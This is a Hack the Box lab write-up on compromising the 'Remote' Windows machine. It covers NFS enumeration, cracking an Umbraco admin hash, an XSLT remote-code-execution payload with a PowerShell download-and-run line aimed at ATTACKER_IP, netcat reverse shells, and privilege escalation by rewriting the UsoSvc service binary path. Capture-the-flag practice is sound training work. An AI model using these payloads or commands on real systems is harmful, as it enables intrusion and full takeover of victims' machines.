Hack the Box — Remote write-up by fcmunhoz
This is my first writeup, by the time I am writing this article, Remote is the newest Windows Machine, released on last week. There is only one more machine to complete the "easy" topic. I said "easy" because I had to learn a lot of new tools and read a lot of writeups and watch videos on youtube to get the skills to finish this machines.
Initial Foothold
Lets scan which services are running and those ports.
nmap -sV -sC -Pn --min-rate 1000 --max-rate 5000 10.10.10.180
- -sV: Detect service version
- -sC: Script Scan
- -Pn: Treat all hosts as online
- — min-rate: Send packets no slower than <number>
- — max-rate: Send packets no faster than <number>
FTP
The first service running is a ftpd server. Is it allowed anonymous login?
ftp open 10.10.10.180
username: anonymous
password: anonymous
User anonymous was successfully logged in. However when listing the directory, zero files were found.
Web server
The next service, is a webserver running on port 80. We can browse the website, I followed the menu route "contact" and clicked on the button "Install Forms".
I was redirected to a Umbraco CMS login page.
I know most of VMs on HackTheBox doesn’t require a brute force tool like Hydra to force login or Dirb Buster to discovery new directories and pages.
User 1
Here we enumerate our next service, rpcbind on port 111. This are useful comma
rpcinfo -p 10.10.10.180
- -p: host
showmount -e 10.10.10.180
- -e: Show the NFS server’s export list
A very important folder is exposed on the service. We mount the folder on our machine.
mmount 10.10.10.180:/site_backups /mnt/tmp
ls -l /mnt/tmp
After a lot of enumeration and some research on Google I found Umbraco CMS config file inside App_Data folder. The best way to read this file is using a tool call strings.
strings Umbraco.sdf
As we can see, the content inside the file, in the order, there is a hash, it´s type SHA1, and the username credentials admin@htb.local.
John the Ripper
The useful tool I usually use to break the hashes is John the Ripper plus rockyou.txt dictionary.
./john --wordlist=/tmp/rockyou.txt /tmp/hash --format=raw-sha1- — wordlist: a custom dictionary you have.
- — format: hash type.
After a few seconds the password was found, and we have the credentials.
Username: admin@htb.local
Password: baconandcheese
Exploitdb
During some steps ago, when I was searching on Google for Umbraco CMS configuration and I also found a script on Exploitdb that is possible remote code execution if you have the credentials.
This script is a PoC to execute calc.exe. We need to modify to execute the right commands.
Change the content on variable cmd to execute powershell command to download a reverse shell.
string cmd = " /C powershell.exe -nop -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP:8080/reverse.ps1\'))";Change the executable file calc.exe to cmd.exe
proc.StartInfo.FileName = “cmd.exe”;Payload
The final payload will be:
payload = '<?xml version=”1.0"?><xsl:stylesheet version=”1.0" xmlns:xsl=”http://www.w3.org/1999/XSL/Transform" xmlns:msxsl=”urn:schemas-microsoft-com:xslt” xmlns:csharp_user=”http://csharp.mycompany.com/mynamespace"><msxsl:script language=”C#” implements-prefix=”csharp_user”>public string xml() { string cmd = “ /C powershell.exe -nop -ep bypass -c IEX((New-Object Net.WebClient).DownloadString(\’http://ATTACKER_IP:8080/reverse.ps1\'));"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = “cmd.exe”; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false;proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match=”/”> <xsl:value-of select=”csharp_user:xml()”/> </xsl:template> </xsl:stylesheet>’;Prepare Reverse Shell
Before we execute the script, we need to configure the reverse.ps1 and serve the file to be downloaded.
You can download the reverse shell on this link:
https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
Edit the script and change the first line with the attacker IP and the desired port to establish the connection.
Serving Reverse Shell
Start a webserver on the same directory the reverse.ps1 file is.
python -m SimpleHTTPServer 8080
Netcat
Open a nc connection listening on the port you configured on the reverse.ps1
nc -nlvp 4444
Now we execute the exploit:
python 46153.pyThe connection was successfully established and we have a shell.
If we list the users folder, there is a directory called Public, we have access and the user.txt flag is there.
Root
We start a new nc connection, this time I used the port 4449.
nc -nlvp 4449
We need download a nc.exe on the victim machine.
We change the same script we used to download the reverse.ps1 but now passing nc.exe
Don’t forget to google and download nc.exe to the same directory that on the webserver is running on port 8080.
cmd.exe /C powershell.exe -nop -ep bypass -c “(New-Object System.Net.WebClient).DownloadFile(‘http://ATTACKER_IP:8080/nc.exe', ‘C:\Users\Public\nc.exe’)”;Let’s execute this command to open another shell
C:\Users\Public\nc.exe ATTACKEIP 4449 -e C:\WINDOWS\System32\cmd.exeNow we have another shell that we can read the output commands.
What services are running?
tasklist /svcWe found a service that can be abused: UsoSvc
Query the service
sc qc UsoSvc
Modify the binary path to open a nc connection with administrator privileges but first we need to stop the service.
Change binpath
sc.exe config UsoSvc binPath=”C:\Windows\System32\spool\drivers\color\nc.exe ATTACKER_IP 4448 -e cmd.exe”Copy the nc.exe to the directory:
C:\Windows\System32\spool\drivers\color\nc.exeStart a new nc.exe connection on port 4448
nc -nlvp 4448
Than start the service back
sc start UsoSvc
I had some failures on starting the service:
[SC] StartService FAILED 1053:
But after a reset on the machine, I was successfully connected as Administrator.
Thanks for reading,
Filipe Munhoz